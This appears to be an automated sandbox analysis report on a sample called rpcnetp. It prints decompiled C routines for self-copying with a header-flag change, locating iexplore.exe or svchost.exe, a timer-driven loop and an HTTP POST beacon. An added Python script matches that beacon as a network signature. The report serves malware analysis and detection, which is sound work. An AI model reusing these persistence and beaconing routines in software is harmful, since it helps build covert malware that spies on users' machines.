  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: Process$Create$CloseHandle$ThreadToken$BlockCurrentDirectoryDuplicateEnvironmentInformationMemoryOpenResumeSystemTerminateUserWritelstrcat
  • String ID:
  • API String ID: 1678882957-0
  • Opcode ID: 195c9657127d0ece1b739d2feb9ea30448834e8276fe395f646a0fbd9e09deb8
  • Instruction ID: f5b20b8953284a8165a29b877f7eeecf3b44c4b9faa719a56fe60fce383bd0f6
  • Opcode Fuzzy Hash: 195c9657127d0ece1b739d2feb9ea30448834e8276fe395f646a0fbd9e09deb8
  • Instruction Fuzzy Hash: C961F7B2812228AFDB218F95CD48EDEBBB9FF08742F10445AF60AE2111D7305A45CFA0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E72B22842(long _a4, void _a8) {
				CHAR* _v8;
				char _v268;
				long _t21;
				int _t24;
				int _t25;
				struct HINSTANCE__* _t28;
				signed short _t30;
				CHAR* _t37;
				void* _t40;
				long _t44;
				CHAR* _t46;
				void* _t48;

				_t21 = GetModuleFileNameA( *0x72b260c4,  &_v268, 0x104);
				if(_t21 == 0) {
					return _t21;
				}
				_v8 = "dll";
				if(_a8 != 0) {
					_v8 = "exe";
				}
				_t46 = _a4;
				lstrcpyA(_t46,  &_v268);
				_t24 = lstrlenA(_t46);
				_t9 = _t46 - 3; // -3
				_t37 = _t24 + _t9;
				_t25 = lstrcmpiA(_t37, _v8);
				if(_t25 != 0) {
					lstrcpyA(_t37, _v8);
					_t25 = CopyFileA( &_v268, _t46, 0);
					if(_t25 != 0) {
						_t25 = CreateFileA(_t46, 0xc0000000, 3, 0, 3, 0, 0);
						_t48 = _t25;
						if(_t48 != 0xffffffff) {
							_t28 =  *0x72b260c4;
							_t40 =  *((intOrPtr*)(_t28 + 0x3c)) + _t28;
							_t44 = _t40 - _t28 + 0x16;
							_a4 = _t44;
							if(_a8 != 0) {
								_t30 =  *(_t40 + 0x16) & 0x0000dfff;
							} else {
								_t30 = 0x00002000 |  *(_t40 + 0x16);
							}
							_a8 = _t30;
							SetFilePointer(_t48, _t44, 0, 0);
							WriteFile(_t48,  &_a8, 2,  &_a4, 0);
							_t25 = CloseHandle(_t48);
						}
					}
				}
				return _t25;
			}


APIs
  • GetModuleFileNameA.KERNEL32(?,00000104), ref: 72B2285D
  • lstrcpyA.KERNEL32(?,?,?,?,00000001), ref: 72B22893
  • lstrlenA.KERNEL32(?,?,?,00000001), ref: 72B22896
  • lstrcmpiA.KERNEL32(-00000003,72B212DC,?,?,00000001), ref: 72B228A4
  • lstrcpyA.KERNEL32(-00000003,72B212DC,?,?,00000001), ref: 72B228B6
  • CopyFileA.KERNEL32 ref: 72B228C3
  • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,00000001), ref: 72B228DA
  • SetFilePointer.KERNEL32(00000000,?,00000000,00000000,?,?,00000001), ref: 72B2291F
  • WriteFile.KERNEL32(00000000,00000000,00000002,?,00000000,?,?,00000001), ref: 72B22931
  • CloseHandle.KERNEL32(00000000,?,?,00000001), ref: 72B22938
Strings
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: File$lstrcpy$CloseCopyCreateHandleModuleNamePointerWritelstrcmpilstrlen
  • String ID: dll$exe
  • API String ID: 3010676052-2048111982
  • Opcode ID: 41059c5f0c257f087289713e3c8953f801aa8b4b035a1268cac12f3048a25823
  • Instruction ID: 39e45ebfadebca685611a7423d435aa536271cb13803ea72af992d0feb52d8ed
  • Opcode Fuzzy Hash: 41059c5f0c257f087289713e3c8953f801aa8b4b035a1268cac12f3048a25823
  • Instruction Fuzzy Hash: C331B636500218BBDB209F56CD48FEB3BFCEF85795F118469FA4AE7142E6308545CB60
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E72B22598(CHAR* _a4, int _a8) {
				void* _v8;
				long _v12;
				int _v16;
				void* _t18;
				char* _t32;
				CHAR* _t34;

				_t32 = 0;
				if( *0x72b26038 != 0) {
					_t34 = _a4;
					while(1) {
						lstrcpyA(_t34, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\iexplore.exe");
						if(_t32 != 0) {
							_t34[0x29] = 0;
						}
						if(RegOpenKeyA(0x80000002, _t34,  &_v8) != 0) {
							goto L10;
						}
						_v16 = _a8;
						RegQueryValueExA(_v8, _t32, 0,  &_v12, _t34,  &_v16);
						RegCloseKey(_v8);
						if(_t32 != 0) {
							lstrcatA(_t34, "\\Internet Explorer\\iexplore.exe");
						}
						if(GetBinaryTypeA(_t34,  &_v12) != 0 && _v12 == 0) {
							_t18 = 1;
							L14:
							return _t18;
						}
						L10:
						if(_t32 != 0) {
							_t18 = 0;
							goto L14;
						}
						_t32 = "ProgramFilesDir";
					}
				}
				GetSystemDirectoryA(_a4, _a8);
				lstrcatA(_a4, "\\svchost.exe");
				return 1;
			}


APIs
  • GetSystemDirectoryA.KERNEL32(?,?), ref: 72B225AF
  • lstrcatA.KERNEL32(?,\svchost.exe), ref: 72B225BD
  • lstrcpyA.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe,00000000,00000044), ref: 72B225D5
  • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 72B225ED
  • RegQueryValueExA.ADVAPI32(?,ProgramFilesDir,00000000,?,?,?), ref: 72B2260C
  • RegCloseKey.ADVAPI32(?), ref: 72B22615
  • lstrcatA.KERNEL32(?,\Internet Explorer\iexplore.exe), ref: 72B22625
  • GetBinaryTypeA.KERNEL32(?,?), ref: 72B22630
Strings
  • \svchost.exe, xrefs: 72B225B5
  • \Internet Explorer\iexplore.exe, xrefs: 72B2261F
  • Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe, xrefs: 72B225CF
  • ProgramFilesDir, xrefs: 72B22608, 72B22644
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: lstrcat$BinaryCloseDirectoryOpenQuerySystemTypeValuelstrcpy
  • String ID: ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe$\Internet Explorer\iexplore.exe$\svchost.exe
  • API String ID: 2611574897-1971102070
  • Opcode ID: 5c6572f8ddf3471d1757c32e47d8a8e638a347b27da69d638de365546d842f4c
  • Instruction ID: aa450610dbcd0adc5716e67513ca5fe787850a5d435588086c1ad627bace7870
  • Opcode Fuzzy Hash: 5c6572f8ddf3471d1757c32e47d8a8e638a347b27da69d638de365546d842f4c
  • Instruction Fuzzy Hash: 2C218E37560344BBDB129E69CC08BDB7BFDEF84286F214529F94AE6006E7308A51CB61
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00A12598(CHAR* _a4, int _a8) {
				void* _v8;
				long _v12;
				int _v16;
				void* _t18;
				char* _t32;
				CHAR* _t34;

				_t32 = 0;
				if( *0xa16038 != 0) {
					_t34 = _a4;
					while(1) {
						lstrcpyA(_t34, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\iexplore.exe");
						if(_t32 != 0) {
							_t34[0x29] = 0;
						}
						if(RegOpenKeyA(0x80000002, _t34,  &_v8) != 0) {
							goto L10;
						}
						_v16 = _a8;
						RegQueryValueExA(_v8, _t32, 0,  &_v12, _t34,  &_v16);
						RegCloseKey(_v8);
						if(_t32 != 0) {
							lstrcatA(_t34, "\\Internet Explorer\\iexplore.exe");
						}
						if(GetBinaryTypeA(_t34,  &_v12) != 0 && _v12 == 0) {
							_t18 = 1;
							L14:
							return _t18;
						}
						L10:
						if(_t32 != 0) {
							_t18 = 0;
							goto L14;
						}
						_t32 = "ProgramFilesDir";
					}
				}
				GetSystemDirectoryA(_a4, _a8);
				lstrcatA(_a4, "\\svchost.exe");
				return 1;
			}


APIs
  • GetSystemDirectoryA.KERNEL32(?,?), ref: 00A125AF
  • lstrcatA.KERNEL32(?,\svchost.exe), ref: 00A125BD
  • lstrcpyA.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe), ref: 00A125D5
  • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00A125ED
  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00A1260C
  • RegCloseKey.ADVAPI32(?), ref: 00A12615
  • lstrcatA.KERNEL32(?,\Internet Explorer\iexplore.exe), ref: 00A12625
  • GetBinaryTypeA.KERNEL32(?,?), ref: 00A12630
Strings
  • \svchost.exe, xrefs: 00A125B5
  • \Internet Explorer\iexplore.exe, xrefs: 00A1261F
  • Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe, xrefs: 00A125CF
  • ProgramFilesDir, xrefs: 00A12644
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: lstrcat$BinaryCloseDirectoryOpenQuerySystemTypeValuelstrcpy
  • String ID: ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe$\Internet Explorer\iexplore.exe$\svchost.exe
  • API String ID: 2611574897-1971102070
  • Opcode ID: d9af8ec1adc1461aa0637ab33f50f143369798456ef589447eccc0f754a32c8a
  • Instruction ID: 49be7993c675de2a0bf383a7d8a0e0d9f36eee42b8b10c87fb1d541596da52c3
  • Opcode Fuzzy Hash: d9af8ec1adc1461aa0637ab33f50f143369798456ef589447eccc0f754a32c8a
  • Instruction Fuzzy Hash: 8D215C36A00144BBDB11DFA0DD48BEA7BBDEF48795F108025FA16D2060E730CAA6DB65
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 95%
			E72B22D7F(_Unknown_base(*)()** _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v8;
				char _v12;
				char _v44;
				signed int _t31;
				_Unknown_base(*)()* _t33;
				signed int _t35;
				signed int _t36;
				intOrPtr* _t37;
				signed int _t44;
				void* _t52;
				signed int* _t55;

				_v8 = 0x4e20;
				_v12 = 0x493e0;
				_t31 = LoadLibraryA("wininet.dll");
				_t55 = _a4;
				_t55[0xd] = _t31;
				if(_t31 != 0) {
					_t5 =  &(_t55[3]); // 0x493ec
					_a4 = _t5;
					_t52 = 0;
					while(1) {
						_t7 = _t52 + 0x72b21574; // 0x72b21324
						_t33 = GetProcAddress(_t55[0xd],  *_t7);
						 *_a4 = _t33;
						if(_t33 == 0) {
							break;
						}
						_a4 =  &(_a4[1]);
						_t52 = _t52 + 4;
						if(_t52 < 0x28) {
							continue;
						}
						_t36 = _t55[3]("Mozilla/4.0 (compatible; MSIE 7.0;)", 0, 0, 0, 0);
						 *_t55 = _t36;
						if(_t36 == 0) {
							L12:
							_t35 = _t36 | 0xffffffff;
							L14:
							return _t35;
						}
						if(_a16 != 0) {
							_t37 = _a12;
							_push( *_t37);
							L72B22946();
						} else {
							_t37 = _a8;
						}
						_t36 = _t55[4]( *_t55, _t37, 0x50, 0x72b211c4, 0x72b211c4, 3, 0, 0);
						_t55[1] = _t36;
						if(_t36 != 0) {
							_t36 = _t55[9](_t36, "POST", 0x72b211c4, 0, 0, 0, 0x84400100, 0);
							_t55[2] = _t36;
							if(_t36 != 0) {
								_t55[5](_t36, 2,  &_v8, 4);
								_t55[5](_t55[2], 5,  &_v12, 4);
								wsprintfA( &_v44, "%s: 0\r\n", "TagId");
								_t44 = _t55[7](_t55[2],  &_v44, 0xffffffff, 0, 0);
								asm("sbb eax, eax");
								_t35 = ( ~_t44 & 0x00000002) - 1;
								goto L14;
							}
						}
						goto L12;
					}
					FreeLibrary(_t55[0xd]);
					_t55[0xd] = 0;
					_t35 = 0;
					goto L14;
				}
				return _t31 | 0xffffffff;
			}


APIs
  • LoadLibraryA.KERNEL32(wininet.dll), ref: 72B22D9A
  • GetProcAddress.KERNEL32(?,72B21324), ref: 72B22DC6
Strings
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: AddressLibraryLoadProc
  • String ID: N$%s: 0$Mozilla/4.0 (compatible; MSIE 7.0;)$POST$TagId$wininet.dll
  • API String ID: 2574300362-1135021940
  • Opcode ID: c91c1c860592b3f528578ac02ed5a4cb714e6664f223f3aca85c5e4039d8444c
  • Instruction ID: a2a5ce718f49d85c2f3b8665ac83783b69dbef2134b55f7e38b1c01db8571e2a
  • Opcode Fuzzy Hash: c91c1c860592b3f528578ac02ed5a4cb714e6664f223f3aca85c5e4039d8444c
  • Instruction Fuzzy Hash: 9B31C2B1500308BFEB21AF64CD89E5B7BFDFF48396B104929F65AD6590D330A854CB20
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 95%
			E00A12D7F(_Unknown_base(*)()** _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v8;
				char _v12;
				char _v44;
				signed int _t31;
				_Unknown_base(*)()* _t33;
				signed int _t35;
				signed int _t36;
				intOrPtr* _t37;
				signed int _t44;
				void* _t52;
				signed int* _t55;

				_v8 = 0x4e20;
				_v12 = 0x493e0;
				_t31 = LoadLibraryA("wininet.dll");
				_t55 = _a4;
				_t55[0xd] = _t31;
				if(_t31 != 0) {
					_t5 =  &(_t55[3]); // 0x493ec
					_a4 = _t5;
					_t52 = 0;
					while(1) {
						_t7 = _t52 + 0xa11574; // 0xa11324
						_t33 = GetProcAddress(_t55[0xd],  *_t7);
						 *_a4 = _t33;
						if(_t33 == 0) {
							break;
						}
						_a4 =  &(_a4[1]);
						_t52 = _t52 + 4;
						if(_t52 < 0x28) {
							continue;
						}
						_t36 = _t55[3]("Mozilla/4.0 (compatible; MSIE 7.0;)", 0, 0, 0, 0);
						 *_t55 = _t36;
						if(_t36 == 0) {
							L12:
							_t35 = _t36 | 0xffffffff;
							L14:
							return _t35;
						}
						if(_a16 != 0) {
							_t37 = _a12;
							_push( *_t37);
							L00A12946();
						} else {
							_t37 = _a8;
						}
						_t36 = _t55[4]( *_t55, _t37, 0x50, 0xa111c4, 0xa111c4, 3, 0, 0);
						_t55[1] = _t36;
						if(_t36 != 0) {
							_t36 = _t55[9](_t36, "POST", 0xa111c4, 0, 0, 0, 0x84400100, 0);
							_t55[2] = _t36;
							if(_t36 != 0) {
								_t55[5](_t36, 2,  &_v8, 4);
								_t55[5](_t55[2], 5,  &_v12, 4);
								wsprintfA( &_v44, "%s: 0\r\n", "TagId");
								_t44 = _t55[7](_t55[2],  &_v44, 0xffffffff, 0, 0);
								asm("sbb eax, eax");
								_t35 = ( ~_t44 & 0x00000002) - 1;
								goto L14;
							}
						}
						goto L12;
					}
					FreeLibrary(_t55[0xd]);
					_t55[0xd] = 0;
					_t35 = 0;
					goto L14;
				}
				return _t31 | 0xffffffff;
			}


APIs
  • LoadLibraryA.KERNEL32(wininet.dll), ref: 00A12D9A
  • GetProcAddress.KERNEL32(?,00A11324), ref: 00A12DC6
Strings
Memory Dump Source
  • Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true
  • Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp
  • Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp
  • Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd
Similarity
  • API ID: AddressLibraryLoadProc
  • String ID: N$%s: 0$Mozilla/4.0 (compatible; MSIE 7.0;)$POST$TagId$wininet.dll
  • API String ID: 2574300362-1135021940
  • Opcode ID: 1f006786011ed46a069ffaf2a68cc34df7a598c70686d4edca63fcc9195deee3
  • Instruction ID: d299126795d9901d4a0bf5278818a5f86450b3b4989ad15f9af825405fd6ac61
  • Opcode Fuzzy Hash: 1f006786011ed46a069ffaf2a68cc34df7a598c70686d4edca63fcc9195deee3
  • Instruction Fuzzy Hash: 4D316FB1500608BFDB209FA0CD89EEBBFB9FF08755B104929F656D6590D370ED948B60
Uniqueness

Uniqueness Score: -1.00%
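
The calls above build one plain-HTTP POST beacon, and because the WinINet entry points are fetched with GetProcAddress (the _t55[n] slots) they never appear in the import table. The script below is an added example, not code from the report or from the sample: it names the constants the decompiler left as magic numbers (port 0x50, service type 3, open flags 0x84400100, option ids 2 and 5) from the documented wininet.h values, and matches the resulting request shape (POST, a "TagId: 0" header, the "Mozilla/4.0 (compatible; MSIE 7.0;)" agent string listed for this function) against constructed HTTP requests. Which API sits in which slot is inferred from argument shapes alone (InternetConnectA, HttpOpenRequestA, InternetSetOptionA and HttpSendRequestA); the server name and path, which the report shows only as the pointer 0xa111c4, are not assumed, and the sample traffic is constructed, not captured from the sandbox run.

```python
"""Decode the WinINet request shape from the decompiled beacon routine and
match it against raw HTTP requests.

Added example for this report; not code from the sample or from Joe Sandbox.
Call identities are inferred from argument shapes (the routine resolves them
with GetProcAddress, so the listing only shows _t55[n] slots):
  _t55[4](h, server, 0x50, user, pass, 3, 0, 0)     -> InternetConnectA
  _t55[9](h, "POST", path, 0, 0, 0, 0x84400100, 0)   -> HttpOpenRequestA
  _t55[5](h, 2 or 5, &value, 4)                     -> InternetSetOptionA
  _t55[7](h, "TagId: 0\\r\\n", -1, 0, 0)              -> HttpSendRequestA
Server name and path are unresolved pointers in the report and not assumed.
"""

# Documented constants from wininet.h
INTERNET_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
INTERNET_OPTIONS = {
    2: "INTERNET_OPTION_CONNECT_TIMEOUT",
    5: "INTERNET_OPTION_SEND_TIMEOUT",
    6: "INTERNET_OPTION_RECEIVE_TIMEOUT",
}
INTERNET_SERVICES = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER", 3: "INTERNET_SERVICE_HTTP"}

# Literal values taken from the decompiled calls on this page
PORT = 0x50
SERVICE = 3
VERB = "POST"
OPEN_FLAGS = 0x84400100
OPTIONS_SET = (2, 5)
EXTRA_HEADER = "TagId: 0"                           # wsprintfA("%s: 0\r\n", "TagId")
USER_AGENT = "Mozilla/4.0 (compatible; MSIE 7.0;)"  # from the function's String ID list


def decode_flags(word):
    """Split a dwFlags word into named bits, keeping any undocumented remainder."""
    names, rest = [], word
    for bit, name in sorted(INTERNET_FLAGS.items(), reverse=True):
        if word & bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append("unknown:0x%08x" % rest)
    return names


def request_profile():
    """Summarise what this call sequence puts on the wire."""
    flags = decode_flags(OPEN_FLAGS)
    return {
        "scheme": "https" if "INTERNET_FLAG_SECURE" in flags else "http",
        "port": PORT,
        "service": INTERNET_SERVICES.get(SERVICE, "unknown:%d" % SERVICE),
        "verb": VERB,
        "flags": flags,
        "timeouts": [INTERNET_OPTIONS.get(o, "unknown:%d" % o) for o in OPTIONS_SET],
        "headers": [EXTRA_HEADER, "User-Agent: " + USER_AGENT],
    }


def parse_request(raw):
    """Minimal HTTP/1.x request-head parser: (method, {lowercased header: value})."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    method = lines[0].split(" ", 1)[0]
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, headers


def matches_beacon(raw):
    """True when a request has the POST + 'TagId: 0' + MSIE 7.0 shape built above."""
    method, headers = parse_request(raw)
    return (method == VERB
            and headers.get("tagid") == "0"
            and headers.get("user-agent") == USER_AGENT)


# Constructed sample traffic (not captured from the sandbox run): the first
# request has the beacon shape, the other two are ordinary requests.
SAMPLES = [
    b"POST /cgi-bin/a.cgi HTTP/1.1\r\nHost: beacon.example.test\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)\r\nTagId: 0\r\nContent-Length: 0\r\n\r\n",
    b"POST /login HTTP/1.1\r\nHost: app.example.test\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)\r\nContent-Length: 0\r\n\r\n",
    b"GET / HTTP/1.1\r\nHost: www.example.test\r\nTagId: 0\r\n\r\n",
]


def scan(samples=SAMPLES):
    """Apply the matcher to each sample request."""
    return [matches_beacon(s) for s in samples]


if __name__ == "__main__":
    for key, value in request_profile().items():
        print("%-9s %s" % (key, value))
    print("beacon matches:", scan())
```

With INTERNET_FLAG_SECURE absent and the port fixed at 80, the beacon is cleartext and visible to any proxy or IDS on the path; the "TagId: 0" header combined with that User-Agent is the narrowest network signature this listing supports, and matches_beacon() applies exactly that.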

C-Code - Quality: 98%
			E72B232DE() {
				void* _v8;
				void* _v12;
				long _v16;
				long _t11;
				signed int _t14;
				void* _t18;
				void* _t20;
				intOrPtr _t26;
				signed int _t30;
				int _t33;
				void* _t34;
				void* _t35;
				void* _t36;
				void* _t38;

				_t11 = GetVersion();
				_t33 = 0;
				 *0x72b260b0 = _t11;
				if( *0x72b2608c == 0 && _t11 < 0) {
					 *0x72b26038 =  *0x72b26038 | 0xffffffff;
				}
				_v8 = GetStdHandle(0xfffffff4);
				_t38 = E72B23420(_t12);
				if(_t38 == _t33) {
					L11:
					_t14 =  *0x72b26038;
					__eflags = _t14 - _t33;
					if(_t14 != _t33) {
						__eflags = _t14 - 2;
						if(_t14 == 2) {
							goto L23;
						}
						__eflags = _t38 - _t33;
						if(_t38 != _t33) {
							L17:
							 *0x72b260ac = CreateEventA(_t33, _t33, _t33, _t33);
							L18:
							_t18 = CreateThread(_t33, _t33, E72B23161, _t33, _t33,  &_v16);
							_v12 = _t18;
							__eflags = _t18 - _t33;
							if(_t18 != _t33) {
								_t20 =  *0x72b260ac;
								__eflags = _t20 - _t33;
								if(_t20 != _t33) {
									WaitForSingleObject(_t20, 0xffffffff);
									CloseHandle( *0x72b260ac);
									 *0x72b260ac = _t33;
								}
								WaitForSingleObject(_v12, 0xffffffff);
								CloseHandle(_v12);
							}
							E72B22FBB(_t35, _t33);
							goto L23;
						}
						__eflags = _t14 - 0xffffffff;
						if(_t14 != 0xffffffff) {
							goto L18;
						}
						goto L17;
					}
					__eflags = _t38 - _t33;
					if(_t38 != _t33) {
						goto L17;
					}
					E72B21EDA();
					goto L23;
				} else {
					_t26 =  *0x72b26008;
					 *0x72b26004 = _t33;
					_t46 =  *((intOrPtr*)(_t26 + 0x28)) - _t33;
					if( *((intOrPtr*)(_t26 + 0x28)) != _t33) {
						 *0x72b26038 = 1;
						SetStdHandle(0xfffffff6, _v8);
						goto L11;
					}
					 *0x72b26038 = 2;
					_t34 = E72B22123(_t33, _t36, CloseHandle, _t38, _t46);
					 *( *0x72b26008 + 0x28) = 1;
					_t30 = E72B22ADB(_t34, _t35, _t36, CloseHandle, _t38, _t46, _t34);
					asm("sbb esi, esi");
					_t38 =  ~_t30 + 1;
					if(_t34 != 0) {
						CloseHandle(_t34);
					}
					if(_t38 != 0) {
						_t33 = 0;
						__eflags = 0;
						goto L11;
					} else {
						E72B22FBB(_t35, _t38);
						_t33 = 0;
						L23:
						if(_v8 != _t33) {
							CloseHandle(_v8);
						}
						ExitProcess(_t33);
					}
				}
			}

Instruction addresses (per decompiled line): 0x72b232e7 to 0x72b23419

APIs
  • GetVersion.KERNEL32 ref: 72B232E7
  • GetStdHandle.KERNEL32(000000F4), ref: 72B23309
  • CloseHandle.KERNEL32(00000000), ref: 72B23363
  • SetStdHandle.KERNEL32(000000F6,?,00000000), ref: 72B23385
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 72B233B5
  • CreateThread.KERNEL32(00000000,00000000,72B23161,00000000,00000000,?), ref: 72B233CD
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 72B233EC
  • CloseHandle.KERNEL32 ref: 72B233F4
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 72B23401
  • CloseHandle.KERNEL32(?), ref: 72B23406
  • CloseHandle.KERNEL32(?,00000000), ref: 72B23416
  • ExitProcess.KERNEL32 ref: 72B23419
Memory Dump Source
  • Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
  • Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd
Similarity
  • API ID: Handle$Close$CreateObjectSingleWait$EventExitProcessThreadVersion
  • String ID:
  • API String ID: 2472693224-0
  • Opcode ID: 27bce71e7147c629c4f655e00d6e1af80deb3abbae097ad88cdb8826969ffa36
  • Instruction ID: 016aedef878e6635e219e695dc34082c73d5b5be0daf8870531cd6c57efd487a
  • Opcode Fuzzy Hash: 27bce71e7147c629c4f655e00d6e1af80deb3abbae097ad88cdb8826969ffa36
  • Instruction Fuzzy Hash: 3A310072440314EFCB216F6ACDC4A4B3EF8DB443E67224A2DE51AE3152D7304D89DB54
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E72B2351D(void* __edx, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagMSG _v32;
				void* __edi;
				void* __esi;
				int _t13;
				long _t17;
				void* _t18;
				void* _t20;
				void* _t23;
				_Unknown_base(*)()* _t31;
				void* _t34;
				void* _t35;
				struct HWND__* _t37;

				_t35 = __edx;
				_t37 = _a4;
				_t13 = _a8;
				_t31 = 0;
				if(_t13 == 0) {
					L17:
					KillTimer(_t37, 0x64);
					do {
					} while (PeekMessageA( &_v32, _t37, 0x113, 0x113, 1) != 0);
					PostQuitMessage(_t31);
					if(_a8 != 0x11) {
						L12:
						_t17 = 0;
						L21:
						return _t17;
					}
					L20:
					_t17 = DefWindowProcA(_t37, _a8, _a12, _a16);
					goto L21;
				}
				_t18 = _t13 - 0xf;
				if(_t18 == 0) {
					 *0x72b26088 = 1;
					 *0x72b2602c = _t31;
					 *0x72b260b8 = _t31;
					L11:
					if(E72B22EA1(_t34, _a16) == 0) {
						_t20 =  *0x72b260ac;
						if(_t20 != _t31) {
							 *0x72b26088 = 1;
							SetEvent(_t20);
						}
						if( *0x72b26088 != _t31) {
							goto L17;
						} else {
							SetTimer(_t37, 0x64, 0xdbba0, _t31);
							goto L12;
						}
					}
					goto L12;
				}
				_t23 = _t18 - 0x102;
				if(_t23 == 0) {
					if(_a12 != 0x64) {
						goto L20;
					}
					KillTimer(_t37, 0x64);
					do {
					} while (PeekMessageA( &_v32, _t37, 0x113, 0x113, 1) != 0);
					E72B2327B(_t34, _t35, _t37, 0x113);
					if( *0x72b26038 == 0) {
						SetTimer(_t37, 0x64, 0xdbba0, 0);
					}
					goto L20;
				}
				if(_t23 == 0x2ed) {
					goto L11;
				}
				goto L20;
			}

Instruction addresses (per decompiled line): 0x72b2351d to 0x72b23636

APIs
  • KillTimer.USER32(?,00000064), ref: 72B2355C
  • PeekMessageA.USER32(?,?,00000113,00000113,00000001), ref: 72B23570
  • SetTimer.USER32(?,00000064,000DBBA0,00000000), ref: 72B23596
  • SetEvent.KERNEL32(?), ref: 72B235D5
  • SetTimer.USER32(?,00000064,000DBBA0,00000000), ref: 72B235EC
  • KillTimer.USER32(?,00000064), ref: 72B235F7
  • PeekMessageA.USER32(?,?,00000113,00000113,00000001), ref: 72B2360B
  • PostQuitMessage.USER32(00000000), ref: 72B23616
